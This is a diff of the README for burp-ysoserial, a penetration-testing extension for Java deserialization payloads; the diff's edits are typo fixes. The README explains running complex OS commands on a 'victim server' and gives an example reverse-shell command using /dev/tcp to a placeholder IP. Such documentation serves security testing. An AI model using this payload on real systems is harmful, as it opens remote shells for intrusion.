summitt/burp-ysoserial/README.md

  The second parameter is obviously the OS command you wish to run.

 ## Complex Commands (i.e. pipes and I/O redirection)
 Note ysoserial in this extension has been updated to accept more complicated commands that in the original.
-For instance commands the following command would fail to execute on the victim server:
+For instance commands like the following command would fail to execute on the victim server in the original ysoserial application.

 ```echo test > /tmp/text.txt```
   or
 ```bash -c "echo test > /tmp/text.txt"```

 This is because to run complex commands that pipe command into other commands in java the arguments needs to be a string Array.
-This version of ysoserial has been modifiedby using a delimter of ",,". to seperate your arguments to the string array.
+This version of ysoserial has been modified by using a delimter of ",," to seperate your arguments to the string array.
 Here is an example of running a more complicated command using this method to get a reverse shell:

  ```/bin/bash,,-c,,bash -i >& /dev/tcp/X.X.X.X/9997 0>&1```